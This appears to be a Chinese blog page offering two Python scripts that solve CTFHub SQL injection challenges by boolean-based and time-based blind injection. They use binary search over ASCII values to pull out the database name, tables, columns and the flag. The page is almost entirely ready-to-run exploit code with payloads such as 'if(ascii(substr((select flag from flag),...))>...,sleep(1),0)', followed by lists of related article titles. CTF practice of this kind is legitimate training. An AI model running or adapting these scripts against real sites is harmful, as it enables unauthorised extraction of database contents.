布尔盲注:

import requests

url = "http://challenge-f0b629835417963e.sandbox.ctfhub.com:10080/"

def inject_database(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select database()),%d,1))>%d,1,0)"%(i,mid)

			params = {'id':payload}

			r = requests.get(url,params = params)

			if "query_success" in r.text:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def inject_table(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = 'sqli'),%d,1))>%d,1,0)"%(i,mid)

			params = {'id':payload}

			r = requests.get(url,params = params)

			if "query_success" in r.text:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def inject_column(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 'flag'),%d,1))>%d,1,0)"%(i,mid)

			params = {'id':payload}

			r = requests.get(url,params = params)

			if "query_success" in r.text:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def flag(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select flag from flag),%d,1))>%d,1,0)"%(i,mid)

			params = {'id':payload}

			r = requests.get(url,params = params)

			if "query_success" in r.text:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

# inject_database(url)

# inject_table(url)

# inject_column(url)

flag(url)

时间盲注:

import requests

import time

#   time.time()

url = "http://challenge-a869b4d983fcacff.sandbox.ctfhub.com:10080/"

def inject_database(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select database()),%d,1))>%d,sleep(1),0)"%(i,mid)

			params = {'id':payload}

			start_time = time.time()	#	注入前的系统时间

			r = requests.get(url,params = params)

			end_time = time.time()		# 	注入后的时间

			if end_time - start_time > 1:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def inject_table(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select table_name from information_schema.tables where table_schema='sqli'),%d,1))>%d,sleep(1),0)"%(i,mid)

			params = {'id':payload}

			start_time = time.time()	#	注入前的系统时间

			r = requests.get(url,params = params)

			end_time = time.time()		# 	注入后的时间

			if end_time - start_time > 1:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def inject_column(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),%d,1))>%d,sleep(1),0)"%(i,mid)

			params = {'id':payload}

			start_time = time.time()	#	注入前的系统时间

			r = requests.get(url,params = params)

			end_time = time.time()		# 	注入后的时间

			if end_time - start_time > 1:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def flag(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select flag from flag),%d,1))>%d,sleep(1),0)"%(i,mid)

			params = {'id':payload}

			start_time = time.time()	#	注入前的系统时间

			r = requests.get(url,params = params)

			end_time = time.time()		# 	注入后的时间

			if end_time - start_time > 1:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

# inject_database(url)

# inject_table(url)

# inject_column(url)

flag(url)

sql布尔盲注和时间盲注的二分脚本的更多相关文章

  1. WEB安全--高级sql注入,爆错注入,布尔盲注,时间盲注

    1.爆错注入 什么情况想能使用报错注入------------页面返回连接错误信息 常用函数 updatexml()if...floorextractvalue updatexml(,concat() ...

  2. Natas17 Writeup(sql盲注之时间盲注)

    Natas17: 源码如下 /* CREATE TABLE `users` ( `username` varchar(64) DEFAULT NULL, `password` varchar(64) ...

  3. sqli-labs(五)——盲注(boolean盲注以及时间盲注)

    第八关: 没有查询信息,输入id=1' 报错 ,也没有报错信息,这里应该是个盲注 使用boolean的盲注吧 先判断boolean的盲注可行 输入id=1' and '1'='1' %23 页面正常 ...

  4. 依托http-headers的 sql注入和时间盲注

    机缘巧合接触了一点关于sql注入的网络安全问题 依托 headers 的 sql 注入 一般来说大家都很清楚用户输入的危险性,通常会对用户表单提交的数据进行过滤(引号转码). 但是如果写过网络爬虫,那 ...

  5. Sqli-LABS通关笔录-5[SQL布尔型盲注]

    /* 请为原作者打个标记.出自:珍惜少年时 */   通过该关卡的学习我掌握到了 1.如何灵活的运用mysql里的MID.ASCII.length.等函数 2.布尔型盲注的认识 3.哦,对了还有.程序 ...

  6. sqli-labs less8-10(布尔盲注时间盲注)

    less-8 布尔盲注 首先利用?id=1' and 1=1 --+和?id=1' and 1=2 --+确定id的类型为单引号''包裹.然后进行盲注. 盲注思路: 破解当前数据库名: and len ...

  7. SQL注入之Sqli-labs系列第九关和第十关(基于时间盲注的注入)

    开始挑战第九关(Blind- Time based- Single Quotes- String)和第十关( Blind- Time based- Double Quotes- String) gog ...

  8. sql注入--bool盲注,时间盲注

    盲注定义: 有时目标存在注入,但在页面上没有任何回显,此时,我们需要利用一些方法进行判断或者尝试得到数据,这个过程称之为盲注. 布尔盲注: 布尔盲注只有true跟false,也就是说它根据你的注入信息 ...

  9. SQL注入之Sqli-labs系列第十五关和第十六关(基于POST的时间盲注)

    开始挑战第十五关(Blind- Boolian Based- String)和 第十六关(Blind- Time Based- Double quotes- String) 访问地址,输入报错语句 ' ...

随机推荐

  1. Hive使用Calcite CBO优化流程及SQL优化实战

    目录 Hive SQL执行流程 Hive debug简单介绍 Hive SQL执行流程 Hive 使用Calcite优化 Hive Calcite优化流程 Hive Calcite使用细则 Hive向 ...

  2. Java多线程--CAS

    在Java多线程并发的情况下同时对一个变量进行操作会出现线程安全的问题,假如我们现在使用20个线程对一个变量不停累加1,代码如下: 1 public class ThreadDemo implemen ...

  3. kafka学习(五)Spring Boot 整合 Kafka

    文章更新时间:2020/06/08 一.创建Spring boot 工程 创建过程不再描述,创建后的工程结构如下: POM文件中要加入几个依赖: <?xml version="1.0& ...

  4. Java随谈(二)对空指针异常的碎碎念

    本文适合对 Java 空指针痛彻心扉的人阅读,推荐阅读时间25分钟. 若有一些Java8 函数式编程的基础可以当成对基础知识的巩固. 一.万恶的null 今天,我们简单谈谈null的问题.因为null ...

  5. 加权图的最小生成树、最短路径算法 - java实现

    加权图相关算法 前言 本文主要介绍加权图算法中两个重要应用:最小生成树和最短路径. 求最小生成树时针对的是加权无向图,加权有向图的最小生成树算法成为"最小属树形图"问题,较为复杂, ...

  6. 报错: Failed to establish a new connection: [WinError 10061] 由于目标计算机积极拒绝,无法连接。'))

    你没打开 1.双击打开 2.点击:

  7. ZooKeeper 【不仅仅是注册中心,你还知道有哪些?】

    什么是 ZooKeeper Apache ZooKeeper 是一个开源的实现高可用的分布式协调服务器.ZooKeeper是一种集中式服务,用于维护配置信息,域名服务,提供分布式同步和集群管理.所有这 ...

  8. Python练习题 023:比后面的人大2岁

    [Python练习题 023] 有5个人坐在一起,问第五个人多少岁?他说比第4个人大2岁.问第4个人岁数,他说比第3个人大2岁.问第三个人,又说比第2人大两岁.问第2个人,说比第一个人大两岁.最后 问 ...

  9. 安装zabbix3.0以及升级到5.0过程

    关闭防火墙: systemctl stop firewalld.service systemctl disable firewalld.service 需要关闭 selinux,一定要关闭这个,开启s ...

  10. Pyinstaller打包通用流程

    Pyinstaller打包通用流程 前言 什么是Pyinstaller Pyinstaller是用于打包python项目的一个工具, 可以将项目代码打包成可执行文件, 在其他机器上使用. 通俗的说, ...